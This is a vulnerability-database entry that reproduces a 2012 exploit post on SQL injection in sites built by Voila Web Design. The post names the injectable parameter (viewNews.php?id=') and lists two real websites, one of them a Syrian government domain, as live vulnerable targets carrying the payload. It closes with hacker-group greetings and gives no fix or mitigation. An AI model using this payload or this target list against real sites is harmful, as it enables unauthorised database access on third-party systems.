Voila Web Design SQL Injection

Vulnerability ID: 1047152
Vulnerability type:
Published: 2012-06-25
Updated: 2012-06-25
CVE ID: N/A
CNNVD-ID: N/A
Affected platform: N/A
CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2012060293
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
# Exploit Title; Voila Web Design SQL Injection Vulnerability
# Date ; 24/6/12
# Author ; 3spi0n
# Script Vendor or Software Link ; http://www.voilasyria.com/
# Category ; Webapps
# Type ; SQL Injection [MySQLi]
# Tested on ; Ubuntu / Win7 / Backtrack

[#] Demo Analyzing ;

http://edpa.gov.sy/forms/news/viewNews.php?id=21' [MySQLi Vuln.]
http://www.qualitysyria.sy/all/viewNews.php?id=61' [MySQLi Vuln.]

[#] Vulnerable Details ;

- MySQLi Vulnerable on sites

Vulnerable File ; viewNews.php?query= [query, variant of index.php file]

Exploit ; viewNews.php?id='

[#] Greetz ;

- Grayhatz Corporation
- My Official Blog, www.Ryuzaki.in
- Facebook.Com/3spi0ne - Twitter.Com/RigidusCO